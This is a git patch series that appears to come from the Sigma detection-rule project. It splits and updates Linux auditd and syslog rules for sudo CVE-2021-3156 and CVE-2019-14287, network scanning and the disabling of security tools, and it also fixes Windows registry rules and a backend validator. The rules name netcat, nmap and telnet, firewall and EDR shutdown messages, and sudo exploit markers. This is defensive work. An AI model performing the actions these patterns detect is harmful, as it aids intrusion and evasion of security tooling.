5ee37487-4eb8-4ac2-9be1-d7d14cdc559f status: experimental description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. | Alternative approach might be to look for flooding of auditd logs due to bruteforcing | @@ -10,17 +10,12 @@ references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit - https://nvd.nist.gov/vuln/detail/cve-2021-3156 -falsepositives: - - Unknown -level: critical tags: - attack.privilege_escalation - attack.t1068 logsource: product: linux service: auditd ---- -id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f detection: selection: type: 'EXECVE' @@ -42,10 +37,6 @@ detection: cmd8: a4: '\' condition: selection and (cmd1 or cmd2 or cmd3 or cmd4) and (cmd5 or cmd6 or cmd7 or cmd8) | count() by host > 50 ---- -id: b9748c98-9ea7-4fdb-80b6-29bed6ba71d2 -detection: - selection: - type: 'SYSCALL' - exe: '/usr/bin/sudoedit' - condition: selection | count() by host > 50 +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml new file mode 100644 index 00000000..865377cc --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml @@ -0,0 +1,29 @@ +title: CVE-2021-3156 Exploitation Attempt +id: b9748c98-9ea7-4fdb-80b6-29bed6ba71d2 +related: + - id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f + type: derived +status: experimental +description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. | + Alternative approach might be to look for flooding of auditd logs due to bruteforcing | + required to trigger the heap-based buffer overflow. +author: Bhabesh Raj +date: 2021/02/01 +references: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 + - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit + - https://nvd.nist.gov/vuln/detail/cve-2021-3156 +tags: + - attack.privilege_escalation + - attack.t1068 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + exe: '/usr/bin/sudoedit' + condition: selection | count() by host > 50 +falsepositives: + - Unknown +level: critical \ No newline at end of file From 30955c488410410021565b498c20368c5cce4b27 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 19:24:11 +0200 Subject: [PATCH 0944/1367] split global lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml --- .../auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml | 1 + .../lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml | 1 + 2 files changed, 2 insertions(+) diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml index 7ff4fa3f..6c49477f 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml @@ -6,6 +6,7 @@ description: Detects exploitation attempt of vulnerability described in CVE-2021 required to trigger the heap-based buffer overflow. author: Bhabesh Raj date: 2021/02/01 +modified: 2021/09/14 references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml index 865377cc..7780da68 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml @@ -9,6 +9,7 @@ description: Detects exploitation attempt of vulnerability described in CVE-2021 required to trigger the heap-based buffer overflow. author: Bhabesh Raj date: 2021/02/01 +modified: 2021/09/14 references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit From bc69900335fdbb0f9d1aa86d3a25a9aa4eb630f1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 19:27:28 +0200 Subject: [PATCH 0945/1367] split global lnx_network_service_scanning.yml --- .../lnx_auditd_network_service_scanning.yml | 31 +++++++++++++++++++ rules/linux/lnx_network_service_scanning.yml | 27 +++------------- 2 files changed, 36 insertions(+), 22 deletions(-) create mode 100644 rules/linux/auditd/lnx_auditd_network_service_scanning.yml diff --git a/rules/linux/auditd/lnx_auditd_network_service_scanning.yml b/rules/linux/auditd/lnx_auditd_network_service_scanning.yml new file mode 100644 index 00000000..59aab8c6 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_network_service_scanning.yml @@ -0,0 +1,31 @@ +title: Linux Network Service Scanning +id: 3761e026-f259-44e6-8826-719ed8079408 +related: + - id: 3e102cd9-a70d-4a7a-9508-403963092f31 + type: derived +status: experimental +description: Detects enumeration of local or remote network services. +author: Alejandro Ortuno, oscd.community +date: 2020/10/21 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md +tags: + - attack.discovery + - attack.t1046 +logsource: + product: linux + service: auditd + definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/master/audit.rules#L182-L183' +detection: + selection: + type: 'SYSCALL' + exe|endswith: + - '/telnet' + - '/nmap' + - '/netcat' + - '/nc' + key: 'network_connect_4' + condition: selection +falsepositives: + - Legitimate administration activities +level: low \ No newline at end of file diff --git a/rules/linux/lnx_network_service_scanning.yml b/rules/linux/lnx_network_service_scanning.yml index ce6d798d..435b641c 100644 --- a/rules/linux/lnx_network_service_scanning.yml +++ b/rules/linux/lnx_network_service_scanning.yml @@ -1,19 +1,15 @@ -action: global title: Linux Network Service Scanning +id: 3e102cd9-a70d-4a7a-9508-403963092f31 status: experimental description: Detects enumeration of local or remote network services. author: Alejandro Ortuno, oscd.community date: 2020/10/21 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md -falsepositives: - - Legitimate administration activities -level: low tags: - attack.discovery - attack.t1046 ---- -id: 3e102cd9-a70d-4a7a-9508-403963092f31 logsource: category: process_creation product: linux @@ -30,19 +26,6 @@ detection: netcat_listen_flag: CommandLine|contains: 'l' condition: (netcat and not netcat_listen_flag) or network_scanning_tools ---- -id: 3761e026-f259-44e6-8826-719ed8079408 -logsource: - product: linux - service: auditd - definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/master/audit.rules#L182-L183' -detection: - selection: - type: 'SYSCALL' - exe|endswith: - - '/telnet' - - '/nmap' - - '/netcat' - - '/nc' - key: 'network_connect_4' - condition: selection +falsepositives: + - Legitimate administration activities +level: low \ No newline at end of file From ecefc6e913d31d3825c78527a1330f6e130a5539 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 19:29:49 +0200 Subject: [PATCH 0946/1367] add missing product --- rules/linux/auditd/lnx_auditd_password_policy_discovery.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml b/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml index eccbff04..ec9ede5a 100644 --- a/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml +++ b/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml @@ -4,9 +4,11 @@ status: stable description: Detects password policy discovery commands author: Ömer Günal, oscd.community date: 2020/10/08 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md logsource: + product: linux service: auditd detection: selection: From 87e5fc48fa437f3b98a8a55602e48b38566a46be Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 19:32:58 +0200 Subject: [PATCH 0947/1367] split global lnx_security_tools_disabling.yml --- rules/linux/lnx_security_tools_disabling.yml | 24 ++++----------- .../lnx_security_tools_disabling_syslog.yml | 30 +++++++++++++++++++ 2 files changed, 35 insertions(+), 19 deletions(-) create mode 100644 rules/linux/lnx_security_tools_disabling_syslog.yml diff --git a/rules/linux/lnx_security_tools_disabling.yml b/rules/linux/lnx_security_tools_disabling.yml index a51eade7..b8e5b816 100644 --- a/rules/linux/lnx_security_tools_disabling.yml +++ b/rules/linux/lnx_security_tools_disabling.yml @@ -1,20 +1,16 @@ -action: global title: Disabling Security Tools +id: e3a8a052-111f-4606-9aee-f28ebeb76776 status: experimental description: Detects disabling security tools author: Ömer Günal, Alejandro Ortuno, oscd.community date: 2020/06/17 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md -falsepositives: - - Legitimate administration activities -level: medium tags: - attack.defense_evasion - attack.t1562.004 - attack.t1089 # an old one ---- -id: e3a8a052-111f-4606-9aee-f28ebeb76776 logsource: category: process_creation product: linux @@ -83,16 +79,6 @@ detection: - 'disable' - 'falcon-sensor' condition: 1 of them ---- -id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 -logsource: - product: linux - service: syslog -detection: - keywords: - - '*stopping iptables*' - - '*stopping ip6tables*' - - '*stopping firewalld*' - - '*stopping cbdaemon*' - - '*stopping falcon-sensor*' - condition: keywords +falsepositives: + - Legitimate administration activities +level: medium \ No newline at end of file diff --git a/rules/linux/lnx_security_tools_disabling_syslog.yml b/rules/linux/lnx_security_tools_disabling_syslog.yml new file mode 100644 index 00000000..655b9528 --- /dev/null +++ b/rules/linux/lnx_security_tools_disabling_syslog.yml @@ -0,0 +1,30 @@ +title: Disabling Security Tools +id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 +related: + - id: e3a8a052-111f-4606-9aee-f28ebeb76776 + type: derived +status: experimental +description: Detects disabling security tools +author: Ömer Günal, Alejandro Ortuno, oscd.community +date: 2020/06/17 +modified: 2021/09/14 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md +tags: + - attack.defense_evasion + - attack.t1562.004 + - attack.t1089 # an old one +logsource: + product: linux + service: syslog +detection: + keywords: + - '*stopping iptables*' + - '*stopping ip6tables*' + - '*stopping firewalld*' + - '*stopping cbdaemon*' + - '*stopping falcon-sensor*' + condition: keywords +falsepositives: + - Legitimate administration activities +level: medium \ No newline at end of file From 38c0f83eaf3bc800685d9836fd8e5b51e69994cd Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 20:07:13 +0200 Subject: [PATCH 0948/1367] split global lnx_sudo_cve_2019_14287.yml --- rules/linux/lnx_sudo_cve_2019_14287.yml | 20 ++++--------- rules/linux/lnx_sudo_cve_2019_14287_user.yml | 30 ++++++++++++++++++++ 2 files changed, 35 insertions(+), 15 deletions(-) create mode 100644 rules/linux/lnx_sudo_cve_2019_14287_user.yml diff --git a/rules/linux/lnx_sudo_cve_2019_14287.yml b/rules/linux/lnx_sudo_cve_2019_14287.yml index 426f5934..22c1cfb6 100644 --- a/rules/linux/lnx_sudo_cve_2019_14287.yml +++ b/rules/linux/lnx_sudo_cve_2019_14287.yml @@ -1,35 +1,25 @@ -action: global title: Sudo Privilege Escalation CVE-2019-14287 +id: f74107df-b6c6-4e80-bf00-4170b658162b status: experimental description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 author: Florian Roth date: 2019/10/15 -modified: 2019/10/20 +modified: 2021/09/14 references: - https://www.openwall.com/lists/oss-security/2019/10/14/1 - https://access.redhat.com/security/cve/cve-2019-14287 - https://twitter.com/matthieugarin/status/1183970598210412546 logsource: product: linux -falsepositives: - - Unlikely -level: critical tags: - attack.privilege_escalation - attack.t1068 - attack.t1169 # an old one - attack.t1548.003 ---- -id: f74107df-b6c6-4e80-bf00-4170b658162b detection: selection_keywords: - '* -u#*' condition: selection_keywords ---- -id: 7fcc54cb-f27d-4684-84b7-436af096f858 -detection: - selection_user: - USER: - - '#-*' - - '#*4294967295' - condition: selection_user +falsepositives: + - Unlikely +level: critical \ No newline at end of file diff --git a/rules/linux/lnx_sudo_cve_2019_14287_user.yml b/rules/linux/lnx_sudo_cve_2019_14287_user.yml new file mode 100644 index 00000000..ab92d197 --- /dev/null +++ b/rules/linux/lnx_sudo_cve_2019_14287_user.yml @@ -0,0 +1,30 @@ +title: Sudo Privilege Escalation CVE-2019-14287 +id: 7fcc54cb-f27d-4684-84b7-436af096f858 +related: + - id: f74107df-b6c6-4e80-bf00-4170b658162b + type: derived +status: experimental +description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 +author: Florian Roth +date: 2019/10/15 +modified: 2021/09/14 +references: + - https://www.openwall.com/lists/oss-security/2019/10/14/1 + - https://access.redhat.com/security/cve/cve-2019-14287 + - https://twitter.com/matthieugarin/status/1183970598210412546 +logsource: + product: linux +tags: + - attack.privilege_escalation + - attack.t1068 + - attack.t1169 # an old one + - attack.t1548.003 +detection: + selection_user: + USER: + - '#-*' + - '#*4294967295' + condition: selection_user +falsepositives: + - Unlikely +level: critical \ No newline at end of file From 83531bb2ff181737ca0394e0f0e9bea10657fbd6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 20:13:57 +0200 Subject: [PATCH 0949/1367] split global lnx_system_info_discovery.yml --- .../lnx_auditd_system_info_discovery2.yml | 35 +++++++++++++++++++ rules/linux/lnx_system_info_discovery.yml | 29 +++------------ 2 files changed, 39 insertions(+), 25 deletions(-) create mode 100644 rules/linux/auditd/lnx_auditd_system_info_discovery2.yml diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml new file mode 100644 index 00000000..60f5afa4 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml @@ -0,0 +1,35 @@ +title: System Information Discovery +id: 1f358e2e-cb63-43c3-b575-dfb072a6814f +related: + - id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 + type: derived +status: stable +description: Detects system information discovery commands +author: Ömer Günal, oscd.community +date: 2020/10/08 +modified: 2020/05/30 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md +tags: + - attack.discovery + - attack.t1082 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'PATH' + name: + - '/sys/class/dmi/id/bios_version' + - '/sys/class/dmi/id/product_name' + - '/sys/class/dmi/id/chassis_vendor' + - '/proc/scsi/scsi' + - '/proc/ide/hd0/model' + - '/proc/version' + - '/etc/*version' + - '/etc/*release' + - '/etc/issue' + condition: selection +falsepositives: + - Legitimate administration activities +level: informational \ No newline at end of file diff --git a/rules/linux/lnx_system_info_discovery.yml b/rules/linux/lnx_system_info_discovery.yml index f8b68956..21f1c28b 100644 --- a/rules/linux/lnx_system_info_discovery.yml +++ b/rules/linux/lnx_system_info_discovery.yml @@ -1,5 +1,5 @@ -action: global title: System Information Discovery +id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 status: stable description: Detects system information discovery commands author: Ömer Günal, oscd.community @@ -7,14 +7,9 @@ date: 2020/10/08 modified: 2020/05/30 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md -falsepositives: - - Legitimate administration activities -level: informational tags: - attack.discovery - attack.t1082 ---- -id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 logsource: product: linux category: process_creation @@ -29,22 +24,6 @@ detection: - '/lscpu' - '/lsmod' condition: selection ---- -id: 1f358e2e-cb63-43c3-b575-dfb072a6814f -logsource: - product: linux - service: auditd -detection: - selection: - type: 'PATH' - name: - - '/sys/class/dmi/id/bios_version' - - '/sys/class/dmi/id/product_name' - - '/sys/class/dmi/id/chassis_vendor' - - '/proc/scsi/scsi' - - '/proc/ide/hd0/model' - - '/proc/version' - - '/etc/*version' - - '/etc/*release' - - '/etc/issue' - condition: selection +falsepositives: + - Legitimate administration activities +level: informational \ No newline at end of file From a3477893def1777bd7df95f721ff2275d22eb22a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 14 Sep 2021 21:02:13 +0200 Subject: [PATCH 0950/1367] Update lnx_auditd_network_service_scanning.yml --- rules/linux/auditd/lnx_auditd_network_service_scanning.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_network_service_scanning.yml b/rules/linux/auditd/lnx_auditd_network_service_scanning.yml index 59aab8c6..ff1e827e 100644 --- a/rules/linux/auditd/lnx_auditd_network_service_scanning.yml +++ b/rules/linux/auditd/lnx_auditd_network_service_scanning.yml @@ -7,6 +7,7 @@ status: experimental description: Detects enumeration of local or remote network services. author: Alejandro Ortuno, oscd.community date: 2020/10/21 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md tags: @@ -28,4 +29,4 @@ detection: condition: selection falsepositives: - Legitimate administration activities -level: low \ No newline at end of file +level: low From a6da209507245992215bcaf535ead823febd75ad Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 14 Sep 2021 21:02:51 +0200 Subject: [PATCH 0951/1367] Update lnx_auditd_system_info_discovery2.yml --- rules/linux/auditd/lnx_auditd_system_info_discovery2.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml index 60f5afa4..dc0f65b6 100644 --- a/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml +++ b/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml @@ -7,7 +7,7 @@ status: stable description: Detects system information discovery commands author: Ömer Günal, oscd.community date: 2020/10/08 -modified: 2020/05/30 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md tags: @@ -32,4 +32,4 @@ detection: condition: selection falsepositives: - Legitimate administration activities -level: informational \ No newline at end of file +level: informational From 33a51df46a458fe021657aaf83ef9b22d2737a57 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 14 Sep 2021 21:03:46 +0200 Subject: [PATCH 0952/1367] Update lnx_system_info_discovery.yml --- rules/linux/lnx_system_info_discovery.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/linux/lnx_system_info_discovery.yml b/rules/linux/lnx_system_info_discovery.yml index 21f1c28b..8bec4ce2 100644 --- a/rules/linux/lnx_system_info_discovery.yml +++ b/rules/linux/lnx_system_info_discovery.yml @@ -4,7 +4,7 @@ status: stable description: Detects system information discovery commands author: Ömer Günal, oscd.community date: 2020/10/08 -modified: 2020/05/30 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md tags: @@ -26,4 +26,4 @@ detection: condition: selection falsepositives: - Legitimate administration activities -level: informational \ No newline at end of file +level: informational From 314fa5aaa5a01356f3fe7948fe0289b27a2e77d4 Mon Sep 17 00:00:00 2001 From: Maxime Lamothe-Brassard Date: Tue, 14 Sep 2021 18:00:09 -0700 Subject: [PATCH 0953/1367] Add validation for logical sub operators. --- tools/sigma/backends/limacharlie.py | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/tools/sigma/backends/limacharlie.py b/tools/sigma/backends/limacharlie.py index 383134a4..0d5e23a2 100644 --- a/tools/sigma/backends/limacharlie.py +++ b/tools/sigma/backends/limacharlie.py @@ -50,6 +50,17 @@ def _mapProcessCreationOperations(node): return node +def _validateSubrules(elem): + # Make sure that all elements in the rules + # are actual operators. Otherwise this + # indicates the Sigma engine provided us + # with partial contextual information we + # cannot map to LimaCharlie data with + # any certainty. + for sub in elem.get( 'rules', [] ): + if not isinstance( sub, dict ): + raise NotImplementedError("Sub-rule does not contain an operator.") + # We support many different log sources so we keep different mapping depending # on the log source and category. # The mapping key is product/category/service. @@ -403,6 +414,7 @@ class LimaCharlieBackend(BaseBackend): result, ] } + _validateSubrules(result) if self._postOpMapper is not None: result = self._postOpMapper(result) return yaml.safe_dump(result) @@ -424,6 +436,7 @@ class LimaCharlieBackend(BaseBackend): "op": "and", "rules": filtered, } + _validateSubrules(result) if self._postOpMapper is not None: result = self._postOpMapper(result) return result @@ -445,6 +458,7 @@ class LimaCharlieBackend(BaseBackend): "op": "or", "rules": filtered, } + _validateSubrules(result) if self._postOpMapper is not None: result = self._postOpMapper(result) return result From 3b8282c221593259a19815c76e52440bc46e064a Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 15 Sep 2021 16:21:30 +0200 Subject: [PATCH 0954/1367] fix detection --- ...calation_via_service_registry_permissions.yml} | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) rename rules/windows/{registry_event/sysmon_possible_privilege_escalation_via_service_registry_permissions_weakness.yml => process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml} (81%) diff --git a/rules/windows/registry_event/sysmon_possible_privilege_escalation_via_service_registry_permissions_weakness.yml b/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml similarity index 81% rename from rules/windows/registry_event/sysmon_possible_privilege_escalation_via_service_registry_permissions_weakness.yml rename to rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml index 48f0533b..683811e1 100755 --- a/rules/windows/registry_event/sysmon_possible_privilege_escalation_via_service_registry_permissions_weakness.yml +++ b/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml @@ -14,16 +14,17 @@ date: 2019/10/26 modified: 2020/09/06 logsource: product: windows - category: registry_event + category: process_creation detection: selection: - IntegrityLevel: 'Medium' - TargetObject|contains: '\services\' - TargetObject|endswith: - - '\ImagePath' - - '\FailureCommand' - - '\Parameters\ServiceDll' + CommandLine|contains|all: + - ControlSet + - services + CommandLine|contains: + - \ImagePath + - \FailureCommand + - \ServiceDll condition: selection falsepositives: - Unknown From 8a847e0538b69d844d21dcf94ff014acd4bb97ed Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 15 Sep 2021 19:05:31 +0200 Subject: [PATCH 0955/1367] Update process_creation_possible_privilege_escalation_via_service_registry_permissions.yml --- ...le_privilege_escalation_via_service_registry_permissions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml b/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml index 683811e1..8c0411ff 100755 --- a/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml +++ b/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml @@ -11,7 +11,7 @@ tags: status: experimental author: Teymur Kheirkhabarov date: 2019/10/26 -modified: 2020/09/06 +modified: 2021/09/15 logsource: product: windows category: process_creation From 6e981f56dfd470e49f9d9bf75fe9991fe7605f10 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 16 Sep 2021 09:20:41 +0200 Subject: [PATCH 0956/1367] fix detection from references --- .../sysmon_registry_persistence_search_order.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml index 0b5fd732..d0063b19 100755 --- a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml +++ b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml @@ -6,7 +6,7 @@ references: - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 -modified: 2021/08/14 +modified: 2021/09/16 tags: - attack.persistence - attack.t1038 # an old one @@ -16,10 +16,10 @@ logsource: product: windows detection: selection: # Detect new COM servers in the user hive - TargetObject|contains|all: - - 'HKU\' - - '_Classes\CLSID\' - - '\InProcServer32\(Default)' + TargetObject|startswith: + - 'HKCR\CLSID\' + - 'HKCU\Software\Classes\CLSID\' + TargetObject|endswith: \InprocServer32\default filter1: Details|contains: # Exclude privileged directories and observed FPs - '%%systemroot%%\system32\' From a926439b394c401050e89a3f014e355d508f87a5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 16 Sep 2021 11:39:45 +0200 Subject: [PATCH 0957/1367] fix: `default` to `(Default)` --- .../registry_event/sysmon_registry_persistence_search_order.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml index d0063b19..d97b58ca 100755 --- a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml +++ b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml @@ -19,7 +19,7 @@ detection: TargetObject|startswith: - 'HKCR\CLSID\' - 'HKCU\Software\Classes\CLSID\' - TargetObject|endswith: \InprocServer32\default + TargetObject|endswith: '\InprocServer32\(Default)' filter1: Details|contains: # Exclude privileged directories and observed FPs - '%%systemroot%%\system32\' From c36cf428aca52c6cbd1325298fa05c901a2e554b Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 16 Sep 2021 16:18:30 +0200 Subject: [PATCH 0958/1367] clean list 1 elem --- .../registry_event/win_outlook_registry_todaypage.yml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/rules/windows/registry_event/win_outlook_registry_todaypage.yml b/rules/windows/registry_event/win_outlook_registry_todaypage.yml index 7b44bfde..05465bf0 100644 --- a/rules/windows/registry_event/win_outlook_registry_todaypage.yml +++ b/rules/windows/registry_event/win_outlook_registry_todaypage.yml @@ -18,12 +18,10 @@ detection: - 'Software\Microsoft\Office\' - '\Outlook\Today\' selectionStamp: - TargetObject|endswith: - - 'Stamp' + TargetObject|endswith: 'Stamp' Details: DWORD (0x00000001) selectionUserDefined: - TargetObject|endswith: - - 'UserDefinedUrl' + TargetObject|endswith: 'UserDefinedUrl' condition: selection1 and (selectionStamp or selectionUserDefined) fields: - Details From 7a22fc6dbaebe77ca1a31d62f60382985781d728 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 16 Sep 2021 16:26:53 +0200 Subject: [PATCH 0959/1367] clean string --- .../registry_event/win_outlook_registry_todaypage.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry_event/win_outlook_registry_todaypage.yml b/rules/windows/registry_event/win_outlook_registry_todaypage.yml index 05465bf0..336b5dc8 100644 --- a/rules/windows/registry_event/win_outlook_registry_todaypage.yml +++ b/rules/windows/registry_event/win_outlook_registry_todaypage.yml @@ -18,10 +18,10 @@ detection: - 'Software\Microsoft\Office\' - '\Outlook\Today\' selectionStamp: - TargetObject|endswith: 'Stamp' - Details: DWORD (0x00000001) + TargetObject|endswith: Stamp + Details: DWORD (0x00000001) selectionUserDefined: - TargetObject|endswith: 'UserDefinedUrl' + TargetObject|endswith: UserDefinedUrl condition: selection1 and (selectionStamp or selectionUserDefined) fields: - Details From 13553ef917099ebadeca6564e26335b1b8a2f326 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 17 Sep 2021 09:53:12 +0700 Subject: [PATCH 0960/1367] Update web_cve_2021_40539_manageengine_adselfservice_exploit.yml --- ...web_cve_2021_40539_manageengine_adselfservice_exploit.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml index f678cfef..875403e8 100644 --- a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml +++ b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml @@ -5,11 +5,15 @@ description: Detects an authentication bypass vulnerability affecting the REST A references: - https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/ - https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html + - https://us-cert.cisa.gov/ncas/alerts/aa21-259a author: Sittikorn S, Nuttakorn Tungpoonsup date: 2021/09/10 +modified: 2021/09/17 tags: - attack.initial_access - attack.t1190 + - attack.persistence + - attack.t1505.003 logsource: product: zoho_manageengine category: webserver @@ -17,6 +21,7 @@ logsource: detection: selection: c-uri|contains: + - '/help/admin-guide/Reports/ReportGenerate.jsp' - '/RestAPI/LogonCustomization' - '/RestAPI/Connection' condition: selection From ebc5ebe7baaa1e6d8ed9f6f7fe6cceef5cd42f34 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 08:23:14 +0200 Subject: [PATCH 0961/1367] cleanup condition --- rules/windows/registry_event/win_outlook_registry_webview.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry_event/win_outlook_registry_webview.yml b/rules/windows/registry_event/win_outlook_registry_webview.yml index 62c4804f..136c765f 100644 --- a/rules/windows/registry_event/win_outlook_registry_webview.yml +++ b/rules/windows/registry_event/win_outlook_registry_webview.yml @@ -7,6 +7,7 @@ references: - 